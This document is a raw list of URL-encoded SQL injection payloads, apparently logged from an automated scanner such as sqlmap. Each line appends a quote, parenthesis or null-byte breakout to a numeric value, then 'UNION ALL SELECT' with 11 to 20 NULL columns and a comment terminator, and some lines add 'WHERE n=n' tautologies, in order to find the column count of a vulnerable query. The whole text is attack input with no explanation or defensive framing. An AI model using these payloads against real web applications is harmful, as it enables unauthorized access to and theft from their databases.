1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%207294%3D7294%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%202770%3D2770%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%204963%3D4963%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%204270%3D4270%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%205922%3D5922%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%207257%3D7257%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%206991%3D6991%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%209413%3D9413%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%209969%3D9969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%208755%3D8755%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202404%3D2404%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%207816%3D7816%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%207426%3D7426%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%209957%3D9957%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%207722%3D7722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204775%3D4775%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204463%3D4463%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%205713%3D5713%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%207901%3D7901%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202164%3D2164%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%205716%3D5716%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%208090%3D8090%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%207252%3D7252%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203355%3D3355%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%201761%3D1761%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%206250%3D6250%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%208944%3D8944%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%204681%3D4681%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%201439%3D1439%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%202610%3D2610%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%204450%3D4450%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206268%3D6268%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203855%3D3855%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%202068%3D2068%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%201470%3D1470%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%202550%3D2550%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%209911%3D9911%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%201243%3D1243%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 